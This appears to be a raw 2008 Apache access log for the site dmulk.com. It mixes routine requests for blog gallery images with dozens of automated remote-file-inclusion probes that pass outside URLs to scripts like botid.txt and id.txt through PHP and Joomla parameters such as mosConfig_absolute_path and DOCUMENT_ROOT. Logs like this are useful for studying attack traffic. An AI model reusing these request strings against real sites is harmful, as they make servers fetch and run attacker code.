72.199.235.196 - - [20/Sep/2008:10:39:50 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-124.jpg HTTP/1.1" 200 484178 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
193.136.63.5 - - [20/Sep/2008:10:39:51 -0700] "GET /logs/access_080520.log//roster/addons/guildbank/searcharrays.php?addonDir=http://beherit.interfree.it/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
193.136.63.5 - - [20/Sep/2008:10:39:51 -0700] "GET /logs//roster/addons/guildbank/searcharrays.php?addonDir=http://beherit.interfree.it/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
193.136.63.5 - - [20/Sep/2008:10:40:00 -0700] "GET /logs/access_080416.log//roster/addons/guildbank/searcharrays.php?addonDir=http://beherit.interfree.it/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.123.216.231 - - [20/Sep/2008:10:40:02 -0700] "GET /logs/access_080412.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.11.14.244 - - [20/Sep/2008:10:40:03 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.tribochina.com//components/com_simpleboard/giannuzzo.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
202.123.216.231 - - [20/Sep/2008:10:40:03 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 200 92700 "-" "libwww-perl/5.808" "www.dmulk.com"
87.11.14.244 - - [20/Sep/2008:10:40:03 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.tribochina.com//components/com_simpleboard/giannuzzo.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:40:04 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1010.jpg HTTP/1.1" 200 378608 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
202.123.216.231 - - [20/Sep/2008:10:40:06 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.123.216.231 - - [20/Sep/2008:10:40:08 -0700] "GET /logs/access_080515.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:40:18 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-043.jpg HTTP/1.1" 200 548023 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
87.101.4.49 - - [20/Sep/2008:10:40:22 -0700] "GET /logs/access_080216.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [20/Sep/2008:10:40:23 -0700] "GET /logs/access_080517.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:40:32 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-210.jpg HTTP/1.1" 200 363096 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
208.116.1.202 - - [20/Sep/2008:10:40:36 -0700] "GET /logs/access_080527.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:40:46 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-106_1.jpg HTTP/1.1" 200 335653 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
77.79.245.90 - - [20/Sep/2008:10:40:57 -0700] "GET //errors.php?error=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.176.205.147 - - [20/Sep/2008:10:40:58 -0700] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://www.soaresdacosta.pt/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.176.205.147 - - [20/Sep/2008:10:40:59 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.soaresdacosta.pt/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:41:00 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-165.jpg HTTP/1.1" 200 347615 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
190.210.9.213 - - [20/Sep/2008:10:41:03 -0700] "GET /logs/access_080309.log//errors.php?error=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
190.210.9.213 - - [20/Sep/2008:10:41:03 -0700] "GET //errors.php?error=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
190.210.9.213 - - [20/Sep/2008:10:41:04 -0700] "GET /logs//errors.php?error=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:41:13 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-246.jpg HTTP/1.1" 200 390396 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
222.231.24.53 - - [20/Sep/2008:10:41:17 -0700] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://danieledm.altervista.org/PhP/id_osirys.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.114 - - [20/Sep/2008:10:41:21 -0700] "GET //errors.php?error=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.75.193.70 - - [20/Sep/2008:10:41:27 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.asa-auto.ba/mambo/cache/fastid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:41:28 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0090.jpg HTTP/1.1" 200 552807 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
80.93.62.114 - - [20/Sep/2008:10:41:28 -0700] "GET /logs/access_080322.log//errors.php?error=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.114 - - [20/Sep/2008:10:41:29 -0700] "GET //errors.php?error=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.114 - - [20/Sep/2008:10:41:29 -0700] "GET /logs//errors.php?error=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.101.4.49 - - [20/Sep/2008:10:41:31 -0700] "GET /logs//inc/download_center_lite.inc.php?script_root=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [20/Sep/2008:10:41:31 -0700] "GET //inc/download_center_lite.inc.php?script_root=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.243.169.10 - - [20/Sep/2008:10:41:54 -0700] "GET /logs/access_080328.log//components/errors.php?error=http://www.stadtbuecherei-erftstadt.de/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:41:55 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-212.jpg HTTP/1.1" 200 454951 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:42:10 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0039.jpg HTTP/1.1" 200 531041 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:42:25 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-110.jpg HTTP/1.1" 200 531565 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
212.176.205.147 - - [20/Sep/2008:10:42:38 -0700] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://www.soaresdacosta.pt/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:42:38 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-148_1.jpg HTTP/1.1" 200 367971 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
70.168.150.67 - - [20/Sep/2008:10:42:47 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1014.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:42:53 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-090_1.jpg HTTP/1.1" 200 356183 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
88.191.76.130 - - [20/Sep/2008:10:42:56 -0700] "GET /logs/access_080815.log/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.139.163.236 - - [20/Sep/2008:10:42:58 -0700] "GET /logs/access_080825.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:43:07 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-073.jpg HTTP/1.1" 200 487764 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:43:22 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0107.jpg HTTP/1.1" 200 359534 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
88.191.76.130 - - [20/Sep/2008:10:43:23 -0700] "GET /logs/access_080820.log/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.64.132.254 - - [20/Sep/2008:10:43:26 -0700] "GET /logs/access_080205.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.64.132.254 - - [20/Sep/2008:10:43:27 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:43:36 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0100.jpg HTTP/1.1" 200 552588 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
141.44.140.111 - - [20/Sep/2008:10:43:47 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://ratakettu.com/dl/avatar/crutz.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:43:50 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-111_0.jpg HTTP/1.1" 200 455376 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
77.79.245.90 - - [20/Sep/2008:10:43:51 -0700] "GET /logs/access_080829.log//errors.php?error=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.245.90 - - [20/Sep/2008:10:43:51 -0700] "GET //errors.php?error=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.245.90 - - [20/Sep/2008:10:43:52 -0700] "GET /logs//errors.php?error=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:44:04 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0146.jpg HTTP/1.1" 200 344149 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
141.44.140.111 - - [20/Sep/2008:10:44:05 -0700] "GET /logs/access_080904.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://ratakettu.com/dl/avatar/crutz.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.64.132.254 - - [20/Sep/2008:10:44:11 -0700] "GET /logs/access_080205.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [20/Sep/2008:10:44:12 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [20/Sep/2008:10:44:13 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:44:18 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-067_0.jpg HTTP/1.1" 200 466805 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:44:46 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-048_0.jpg HTTP/1.1" 200 235531 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.52.169.98 - - [20/Sep/2008:10:44:59 -0700] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://www.kupc.org/zero/bbs//skin/zero_vote/ooid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:45:00 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-235.jpg HTTP/1.1" 200 311164 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.52.169.98 - - [20/Sep/2008:10:45:04 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.kupc.org/zero/bbs//skin/zero_vote/ooid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:45:14 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-018_1.jpg HTTP/1.1" 200 315455 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
74.6.18.225 - - [20/Sep/2008:10:45:23 -0700] "GET /logs/access_070628.log HTTP/1.0" 200 28980 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.93.62.114 - - [20/Sep/2008:10:45:28 -0700] "GET /logs/access_080216.log//errors.php?error=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:45:28 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0003.jpg HTTP/1.1" 200 413558 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:45:42 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-138_0.jpg HTTP/1.1" 200 422812 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:45:55 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-149_1.jpg HTTP/1.1" 200 267536 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
65.254.41.162 - - [20/Sep/2008:10:46:05 -0700] "GET /logs/access_080803.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:46:09 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-173.jpg HTTP/1.1" 200 357615 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
65.254.41.162 - - [20/Sep/2008:10:46:10 -0700] "GET /logs/access_080820.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:46:37 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-008_3.jpg HTTP/1.1" 200 486526 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:46:51 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-081_0.jpg HTTP/1.1" 200 419032 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:47:04 -0700] "GET /blog/wp-content/gallery/occ-hondas-2008/6697_1.jpg HTTP/1.1" 200 26779 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
203.144.4.70 - - [20/Sep/2008:10:47:04 -0700] "GET /index.php?page=http://www.buenosairesidiomas.com/centro/xuxuon.txt?? HTTP/1.1" 200 92310 "-" "libwww-perl/5.805" "www.dmulk.com"
203.144.4.70 - - [20/Sep/2008:10:47:04 -0700] "GET /index.php?page=http://www.buenosairesidiomas.com/centro/xuxuon.txt?? HTTP/1.1" 200 92326 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.114 - - [20/Sep/2008:10:47:07 -0700] "GET /logs/HTMLSax3.php?dir%5Bplugins%5D=http://www.geocities.com/ixan_xdet/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.114 - - [20/Sep/2008:10:47:08 -0700] "GET /HTMLSax3.php?dir%5Bplugins%5D=http://www.geocities.com/ixan_xdet/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:47:17 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-034_3.jpg HTTP/1.1" 200 307841 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:47:31 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-287.jpg HTTP/1.1" 200 297926 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
202.123.216.231 - - [20/Sep/2008:10:47:40 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.123.216.231 - - [20/Sep/2008:10:47:42 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 200 92656 "-" "libwww-perl/5.808" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:47:50 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0040.jpg HTTP/1.1" 200 379587 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.52.169.98 - - [20/Sep/2008:10:47:52 -0700] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://www.kupc.org/zero/bbs//skin/zero_vote/ooid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:48:04 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-141.jpg HTTP/1.1" 200 409539 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:48:17 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-275.jpg HTTP/1.1" 200 309469 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
190.210.9.213 - - [20/Sep/2008:10:48:18 -0700] "GET /logs/access_080725.log//errors.php?error=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:48:30 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-012_1.jpg HTTP/1.1" 200 456629 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
209.216.249.151 - - [20/Sep/2008:10:48:38 -0700] "GET /logs/access_080820.log/index.php?product=http://www.besosmimosycaricias.com/blid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.249.151 - - [20/Sep/2008:10:48:39 -0700] "GET /index.php?product=http://www.besosmimosycaricias.com/blid.txt??? HTTP/1.1" 200 92290 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.249.151 - - [20/Sep/2008:10:48:40 -0700] "GET /logs/index.php?product=http://www.besosmimosycaricias.com/blid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:48:43 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1023.jpg HTTP/1.1" 200 313610 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:48:57 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-270.jpg HTTP/1.1" 200 299263 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:49:11 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-148_0.jpg HTTP/1.1" 200 274811 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
83.64.132.254 - - [20/Sep/2008:10:49:18 -0700] "GET /logs/access_080519.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:49:25 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-215.jpg HTTP/1.1" 200 429846 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:49:38 -0700] "GET /blog/wp-content/gallery/occ-hondas-2008/4783_1.jpg HTTP/1.1" 200 27415 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:49:53 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-125_0.jpg HTTP/1.1" 200 575385 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
200.48.189.45 - - [20/Sep/2008:10:49:53 -0700] "GET /logs/access_080815.log//index.php?option=com_custompages&cpage=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.48.189.45 - - [20/Sep/2008:10:49:57 -0700] "GET /logs/access_080901.log//index.php?option=com_custompages&cpage=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:50:06 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-131_0.jpg HTTP/1.1" 200 359025 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:50:21 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-168.jpg HTTP/1.1" 200 421778 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
85.17.56.34 - - [20/Sep/2008:10:50:21 -0700] "GET /logs/?sourcedir=http://iwdc.cnit.it/administrator/components/com_template_gen/images/bot.txt?? HTTP/1.1" 200 65871 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
85.17.56.34 - - [20/Sep/2008:10:50:22 -0700] "GET /?sourcedir=http://iwdc.cnit.it/administrator/components/com_template_gen/images/bot.txt?? HTTP/1.1" 200 92461 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:50:35 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-144_0.jpg HTTP/1.1" 200 456573 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
